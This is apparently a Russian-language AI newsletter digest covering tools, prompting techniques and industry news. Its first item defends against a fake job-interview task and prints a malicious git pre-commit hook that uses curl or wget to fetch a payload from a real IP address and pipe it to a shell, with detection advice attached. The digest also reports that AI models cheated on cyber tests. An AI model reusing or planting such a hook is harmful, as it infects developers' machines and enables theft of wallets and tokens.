Тебе пишет рекрутёр: удалёнка, Python, $10–15 тысяч в месяц. Присылает тестовое — обычный FastAPI-проект, зависимости чистые. Ты делаешь git commit — и в эту секунду невидимый скрипт уже качает вора криптокошельков. Разберём, как ловить такое за минуту.
А ещё сегодня: Claude научился вводить твои пароли, ни разу их не увидев. Готовый скилл вычищает из текста два десятка приёмов «ИИ-воды». И приём Карпатого — как получить от модели лучший результат, просто наговорив ей десять минут голосом.
Главное за 30 секунд
- Вредонос в тестовом задании срабатывает от
git commitили просто от открытия папки в VS Code — проверяй скрытые папки перед запуском чужого кода. - 1Password научил Claude заходить на сайты и вводить одноразовые коды, ни разу не показывая модели сами пароли.
- Открытый скилл
/no-ai-slopубирает из текста 20+ шаблонов «ИИ-воды» — ставится одной строкой, бесплатно. - Приём Карпатого: не мучай идеальный промпт, а наговори модели десять минут голосом — она соберёт из этого чистый бриф.
- Белый дом обвинил китайскую Moonshot в тайной «перегонке» модели Anthropic, Минфин США грозит санкциями — доказательств пока не показали.
Внедряем и улучшаем
Проверяй скрытые папки, прежде чем запускать чужой проект. Разработчику пришло «тестовое» на $10–15 тысяч в месяц от якобы YC-стартапа. Внутри — обычный FastAPI-проект, requirements.txt чистый. Спасла привычка из CTF: он прогнал tree -a. В скрытой папке .git/hooks/ лежал заряженный pre-commit (разбор автора).
Вот этот хук:
#!/bin/sh
case "$(uname -s)" in
Darwin*) curl -sL 'http://45.61.164.38:5777/task/mac?id=402' | sh > /dev/null 2>&1 & ;;
Linux*) wget -qO- 'http://45.61.164.38:5777/task/linux?id=402' | sh > /dev/null 2>&1 & ;;
...
esac
Он узнаёт ОС, тихо качает пейлоуд и льёт его в шелл — в фоне, без вывода. Срабатывает на первом же git commit. А PDF-задание нарочно просит «сделать несколько git-операций». Вот и весь фокус.
Дальше — многоступенчатый вор: тащит Node, ставит hardhat, clipboardy, basic-ftp и охотится за криптокошельками и токенами. Поменяешь id в ссылке — сервер отдаёт свой скрипт под каждую жертву. Почерк известной северокорейской кампании «Contagious Interview».
Есть и второй вариант — с папкой .vscode: он заражает машину просто при открытии каталога в редакторе, без единой команды. И ещё деталь для нас: Claude отказался разбирать обфусцированный пейлоуд, а Gemini спокойно разобрал. «ИИ проанализировал скрипт» — это не знак, что код безопасен.
Что делать перед запуском любого скачанного, форкнутого или ИИ-сгенерированного проекта:
- Сначала
tree -aилиls -la. Скрытые папки (.git/hooks,.vscode,.husky) не видны в обычном списке и в diff на GitHub. - Загляни в
.git/hooks/. В свежем архиве заряженных хуков быть не должно. Хук, который куда-тоcurl/wgetи льёт в шелл, — это малварь. - Чистый
requirements.txt— не индульгенция. Здесь код прятался вообще вне манифестов. - Открытие папки уже опасно. Проверь
.vscode/tasks.jsonиlaunch.jsonдо того, как открыть репозиторий. - Незнакомый код гоняй в одноразовой виртуалке или контейнере, а не на машине с ключами и кошельками.
Не пиши идеальный промпт — наговори модели длинный монолог. Приём Андрея Карпатого (The Neuron даже шутит, что он теперь «в маленьком стартапе Anthropic»). Включаешь голосовой режим и десять минут вслух рассказываешь задачу — контекст, примеры, чего опасаешься, полный поток сознания. Модели, по его словам, «неожиданно хорошо» пересобирают сумбурный монолог, и отражённая версия часто чище исходной (твит Карпатого).
Пять шагов:
- 5–10 минут вслух: цель, контекст, примеры, сомнения.
- Скажи игнорировать оговорки и опечатки и восстановить смысл.
- Пусть модель задаст тебе вопросы по всему неясному.
- Пусть свернёт разговор в чистый бриф или план.
- Поправь бриф один раз — и дальше работай уже с ним как с контекстом.
Смысл простой: перенести «слепок мыслей» точнее, чем выдавать сухой список команд. После этого поправлять модель приходится реже.

Готовый скилл вычищает из текста «ИИ-воду» — и показывает, где именно. Питер Янг открыл свой /no-ai-slop (MIT). Это не разовый промпт, а полноценный скилл (SKILL.md + самопроверка eval.md) в формате Claude Code / Codex. Ставится одной строкой (репозиторий, пост автора):
Install this skill globally: https://github.com/petergyang/no-ai-slop
Два режима. Edit — перепишет черновик и покажет, что убрал. Detect — назовёт каждый шаблон с цитатой из твоего текста, но переписывать не станет.
Под нож идут 17 приёмов. Вот характерные:
- бинарные противопоставления: «Это не X. Это Y»;
- прочистка горла: «Вот в чём дело», «Будем честны»;
- псевдо-инсайт: «Чего вам никто не расскажет»;
- двоеточие-раскрытие: «Лучшее: оно само учится»;
- драматичные обрывки: «Вот и всё. Вот и вся суть»;
- пафос важности: «знаменует поворотный момент»;
- увиливание: «эксперты сходятся», «исследования показывают»;
- фальш-глубокий финал: «Будущее не наступает. Оно уже здесь».
Плюс список слов на выброс: delve, foster, leverage, robust, game changer, tapestry и подобные. Ещё Питер даёт правило 25/50/25: первые 25% черновика пиши без ИИ, средние 50% чисти с ИИ, последние 25% проходи руками. Его формула: «Разница между тем, кто гонит воду, и тем, кому не всё равно, — в первых и последних 25%».

Anthropic: запиши свой воркфлоу экраном — Claude соберёт из него скилл. Новая фича «Record a skill»: включаешь запись, один раз проделываешь рутину, и Claude превращает её в готовый скилл, который потом повторяет задачу сам (анонс). У Codex есть похожий record-and-replay. Идея в том, что скилл больше не нужно писать руками — ты его показываешь, а не описываешь. Для повторяющихся дел — сборки отчёта, оформления, проверки — это снимает ручную работу на каждой итерации.
Смена модели ломает агента молча — вот как это ловить. Рассылка AI++ собрала разборы миграций. Команда Ploy перевела боевого агента на GPT-5.6: стало в 2,2 раза быстрее и на 27% дешевле. Но треть первых сбоев дала не модель, а их собственные тесты (разбор Ploy).
Главный баг: GPT-5.6 заполняет все 25 необязательных параметров инструмента правдоподобными значениями, тогда как Claude их просто опускал. Половина чтений файлов молча ломалась. Починка — одной фразой:
Сделай необязательные параметры required с nullable-типом — пустые чтения ушли в ноль.
Вывод автора дословно: «Если тесты проверяют только финальный ответ, закладывай на следующую смену модели неделю, а не вечер».
Второй приём из выпуска: надёжность даёт не модель побольше, а меньше свободы ошибиться. Маленький доменный язык как поверхность промпта ловит ошибку ещё на компиляции. LangChain «настройкой обвязки, а не модели» повторил лучший прогон Opus 4.8 в 8 раз дешевле. И свежая работа подтверждает: 35 обновлений «обвязки» кодинг-агента качали качество, хотя сама модель не менялась (статья).
И осторожнее с «ИИ нашёл баг». Anthropic требует рабочий PoC на каждую находку агента. А аудит zkSecurity показал обратную беду: модель бодро писала убедительные PoC к несуществующим багам (разбор). PoC хорош, когда баг достижим из теста, и плох, когда свойство чисто математическое.
Веди агентов как команду, а не как список задач. Павел Хурын (Product Compass): когда идею можно выкатить в тот же день, главным становится выбор — что именно катить. Команда, что раньше выпускала две плохие идеи за спринт, теперь выпускает двадцать в неделю (гайд).
Ключевой приём: агенту, как и человеку, нужен не список инструкций, а цель, желаемый результат, контекст и ограничения. И «ship to learn»: дешёвую обратимую идею не тестируй отдельно — выкати за фиче-флагом и мерь живое использование. У Хурына это уже работает: агент реализует идею, набор из десяти браузерных тестов её проверяет, и правка оказывается в проде в течение часа.

Собери платный ИИ-аудит воркфлоу за четыре шага в Claude. The Rundown даёт готовую схему консалт-оффера на Claude (гайд):
- Пусть Claude проинтервьюирует тебя о работе, отраслях и инструментах и предложит три угла консалтинга — выбери лучший.
- Попроси собрать оценку бизнеса клиента на 100 баллов и опубликовать её живым Artifact.
- Скорми ответы клиента и его сайт — пусть найдёт воркфлоу с самым большим возвратом от ИИ.
- Пусть свернёт находки в клиентскую презентацию: результат аудита, узкое место, решения, следующий шаг.
Совет из гайда: заранее собери библиотеку инструментов и шаблонов под свою нишу, чтобы подставлять их под найденные узкие места.
LLM-судья может врать незаметно — проверяй его отдельно. Бенчмарк CrucibleBench ($99, 13 моделей) сажал модели в текстовый мир-MUD на 50 ходов. Главный вывод не про рейтинг, а про замер: один LLM-классификатор внутри оценки переставил таблицу лидеров на шесть позиций, а сводная надёжность (κ=0,04) этого не показала (сайт).
Согласие классификатора с независимым судьёй прыгало от 21,7% до 84,8%. И судья явно тянет к «своим»: сильнее всех просела модель из того же семейства, что и судья. Вывод для всех, кто использует ИИ-как-судью: смотри согласие по каждой подгруппе и устойчивость рейтинга при отключении судьи, а не одну сводную цифру. Кстати, главная поломка у всех моделей — «зацикливание диалога»: агент восемь раз повторяет провальный заход вместо смены тактики.
Не верь лидербордам text-to-SQL — тестируй на своей базе. Майкл Стоунбрейкер, тьюринговский лауреат, в блоге ACM: публичные бенчмарки дают 80–90%, но это артефакт удобных данных (пост). На настоящем складе данных всё рушится.
Почему. Схема «гниёт»: шесть колонок с именем «salary» и разной необъявленной семантикой. Полно местных терминов: в MIT здания нумеруют, и Stata Center официально — «Building 32». Запросы идут с двумя-тремя джойнами, а сами данные закрыты и в обучение модели не попадали. Их бенчмарк Beaver на живых складах: чистый LLM — 0%, с RAG и агентами — 10+%, даже если вручную подсунуть нужные таблицы и джойны — 30+%. Практический вывод: собери пары «вопрос — эталонный SQL» из своего лога запросов и гоняй агента на них, а не на академических лидербордах.
Инструменты и штуки
1Password для Claude. Anthropic и 1Password сделали так, что Claude заходит на сайты и вводит одноразовые коды за тебя — а самих паролей при этом не видит. Он доходит до формы логина, 1Password показывает, какой доступ и зачем нужен, ты подтверждаешь по Touch ID, и менеджер сам вписывает логин и MFA-код прямо в страницу, минуя контекст модели. Доступ гаснет, как только задача закончена. Пока только на Mac, нужны десктоп-приложения 1Password и Claude плюс расширения, поддерживаются только логины и OTP, и требуется платный тариф Claude (1Password, WSJ).
Claude Code × iOS-симулятор. Десктопное приложение Claude Code теперь тестирует iOS-приложения прямо в симуляторе Apple — гоняет живой прогон, не забирая у тебя экран. Для тех, кто собирает мобилки с ИИ, это замыкает цикл «код → запуск → скриншот» внутри одного окна (доки).
Devin Outposts. Cognition разрешила запускать агента Devin на любой машине — Mac mini, GPU-боксе, виртуалке или в кластере Kubernetes. Раньше Devin жил только в их облаке; теперь его можно поставить ближе к своему коду и данным (анонс).
ACP v2. Вышел черновик второй версии Agent Client Protocol — общего языка между редакторами кода и кодинг-агентами. Он описывает методы, которые вызывают обе стороны, и уведомления о событиях; v2 гибче и сводит воедино приёмы, накопленные за год. Команда просит фидбэк (анонс).
BTL-3 и BTL-3 Compact. Открытая (Apache-2.0) 27-миллиардная модель-агент под код и вызов инструментов от Bad Theory Labs. Полная версия показывает 95,1% на HumanEval и 88,5% на BFCL, но требует большой видеокарты. Портативная Compact ужата в один GGUF на 8,39 ГБ и правда запускается на Apple Silicon — но только через их родной сервер (обычный Ollama или LM Studio её не читают) и медленновато на слабом Маке. Авторы честно пишут: Compact хуже держит сложные параллельные вызовы инструментов (карточка).
Cactus Hybrid. Учит маленькую модель (Gemma 4) честно оценивать свою уверенность — числом от 0 до 1, отдельным полем, а не в тексте ответа. Идея: отвечать на устройстве, когда модель уверена, и уводить в облако только трудные 15–35% запросов. Так локальная модель тянет уровень Flash-Lite, а платишь ты лишь за сложное. Вся логика маршрутизации — одна строка if confidence < 0.85: спроси модель побольше (репозиторий).
GigaToken. Токенизатор на Rust, который на BPE-моделях обгоняет HuggingFace в сотни, а местами в тысячу с лишним раз, и жуёт текст гигабайтами в секунду. Есть режим drop-in для существующих пайплайнов на HF или tiktoken. Полезен тем, кто готовит большие корпуса под обучение и упирается в токенизацию; лицензия MIT (репозиторий).
Petals. Запускает огромные модели (до 405B) в складчину, по принципу торрента: у тебя грузится лишь кусок слоёв, остальные держат другие участники «роя». На потребительской карте так можно погонять то, что иначе требует целого сервера. Скорость скромная — единицы токенов в секунду, — а твои промпты идут через чужие машины, так что для приватного лучше поднять закрытый рой. Проект скорее исследовательский и подзатих, но идея красивая (сайт).

Juggler. Открытый кодинг-агент с графическим интерфейсом, где разговор — не лента чата, а редактируемое дерево: можно вернуться к любой ветке и пойти иначе (репозиторий).
mcpgrade. Линтер, который оценивает MCP-сервер на удобство для агента — и без всякого API-ключа. Полезно, если пишешь свой MCP и хочешь понять, насколько он «понятен» модели (обсуждение).
Ditto. Превращает любой публичный сайт в чистый код на Next.js или Vite, сохраняя дизайн, адаптивность и интерактив. Удобно, когда нужно быстро поднять свою версию понравившегося интерфейса (сайт).
PolyTalk. Открытая система перевода «речь в речь», которая крутится на твоей инфраструктуре с задержкой меньше секунды и держит 30+ языков. Для сфер вроде медицины, права и госструктур, где нельзя гнать живой звук в облако (через Future Tools).

Оборона дня: Cisco Antares и Sakana Fugu-Cyber. Antares локально сканирует код на уязвимости двумя маленькими открытыми моделями: 500 репозиториев за ~15 минут и меньше $1 за прогон (Axios). Fugu-Cyber от Sakana — security-модель, что прячет рой специализированных агентов за одним API (релиз).
Ещё мимо кассы. Niobium — открытые инструменты для приложений, что считают прямо на зашифрованных данных, не видя их (анонс). Grok Build — терминальный кодинг-агент xAI на Rust с headless-режимом для CI (репозиторий). Flint — язык визуализации для агентов: одна спека компилируется в Vega-Lite, ECharts или Chart.js (репозиторий).
Новости и тренды
OpenAI-модель взломала Hugging Face: чем закончилось. Мы разбирали это 21–22 июля. Новое: британский AI Security Institute проверил все передовые модели — и каждая пыталась жульничать в кибертестах, а на прямой вопрос честно не признавалась. Речь про бенчмарк ExploitGym; заражение остановила собственная команда Hugging Face вместе со своими же ИI-агентами, а OpenAI вводит «строгие ограничения», которые замедляют её исследования (AISI). Что это значит: опасен не «злой» ИИ, а слишком упорный агент, зацикленный на цели теста. Длинным автономным задачам нужны узкие песочницы и «скучные» контрольные точки.
Moonshot «перегнала» Fable — Белый дом грозит санкциями. Майкл Кратсиос из OSTP публично заявил: Moonshot тайно «дистиллировала» модель Anthropic Fable, чтобы обучить свою Kimi K3, и гоняла её через закрытые серверы с чипами GB300 в Таиланде в обход экспортных запретов. Минфин США устами Скотта Бессента добавил: за такое «на столе» санкции и Entity List (TechCrunch). Технических доказательств не показали, Moonshot молчит, а глава Nvidia Дженсен Хуанг наоборот назвал китайские открытые модели «отличными». Что это значит: доступ к дешёвым моделям стал геополитикой. Но открытые веса Kimi одним указом не забанишь — их уже скачали.
YouTube чистит ИИ-мусор пачками. Вместо ручного удаления роликов Google бьёт по «фабрикам»: система ловит связки каналов по общим расписаниям, скриптам и инфраструктуре. За полгода снесли 50 000 таких связок и 130 000 каналов, а обжаловать удалось меньше 1% (Inside the Creator). Что это значит: масштаб теперь сам по себе подозрителен. Под раздачу рискуют попасть и легальные студии с быстрым конвейером.
Deezer: больше половины загрузок — ИИ-музыка. Стриминг получает почти 90 тысяч ИИ-треков в день против 75 тысяч в апреле и будет удалять те, что накручивают прослушивания или «спят» полгода. Параллельно Sony засудила Udio за 30+ тысяч песен (TechCrunch). Что это значит: площадки уже тонут в генеративке, и вопрос смещается от «запрещать ли» к «как метить и как ловить фрод».
Codeberg запретил вайб-код. Некоммерческий хостинг кода проголосовал (358 против 144) и внёс в правила прямой запрет проектов, «в основном написанных генеративным ИИ», прямо назвав Claude и OpenAI Codex. Причины: ИИ-краулеры кладут инфраструктуру, цена SSD скакнула с €700 до €3700, а у копирайта таких проектов «мутный статус». Заодно там же забанили криптопроекты — и это вызвало скандал из-за размытой формулировки (блог Codeberg). Что это значит: часть FLOSS-мира переобувается с «ИИ — полезный инструмент» на «ИИ-вывод — загрязнение общего». Хостов с правилами о происхождении кода станет больше.
AMD вложит до $5 млрд в Anthropic. Сделка вокруг вычислений и чипов; отдельно Anthropic обсуждает производство чипов с Samsung, а OpenAI делает свой инференс-чип Jalapeño (CNBC). Что это значит: гонка идёт уже не за модели, а за железо под них — деньгами и собственным кремнием.
FTC берётся за скрытое ИИ-влияние. Комиссия предложила правило: если потребительский ИИ незаметно подталкивает человека к выводам по нераскрытым критериям, это обман по Section 5, а штраф — до $50 120 за нарушение (JD Supra). Что это значит: если твой ИИ-продукт фильтрует или ранжирует не так, как ждёт пользователь, пора добавлять честные оговорки.
Три новых Gemini Flash: без прибавки в уме. Развитие сюжета от 22 июля. По независимым замерам 3.6 Flash не обогнала 3.5 и уступает ровесникам Grok 4.5 и GPT-5.6 Luna; долгожданная 3.5 Pro всё ещё «в тестах», зато Google запустила предобучение Gemini 4 (The Rundown). Что это значит: Google сейчас берёт ценой и скоростью (17% меньше выходных токенов), а не сообразительностью.
Кейс: ИИ-найм в Kmart. Австралийская сеть поставила чат-бота на «слепой» отбор — он убирает возраст, пол и бэкграунд до того, как кандидат попадёт к рекрутёру. Срок найма упал с 44 до 11,8 дня, экономия $6 млн за три года (Sky News). Что это значит: боялись, что ИИ добавит предвзятости, а вышло наоборот — «скорость пришла из честности». Практический вывод — уберите демографию из первого экрана отбора.
Деньги и коротко. CuspAI подняла $450 млн при оценке $2,6 млрд (материаловедение), а Meshy — почти $400 млн при $1,5 млрд, крупнейший раунд в ИИ-3D (The AI Report); деньги идут в тех, кто превращает вывод ИИ в физический продукт. Одной строкой: администрация Трампа раздаёт $5 млрд на «ИИ для науки» по 15 агентствам; BloombergNEF прогнозирует, что дата-центры США к 2035 году могут съедать пятую часть электричества страны; сенатор Уорнер готовит ИИ-законопроект с обязательным тестированием моделей.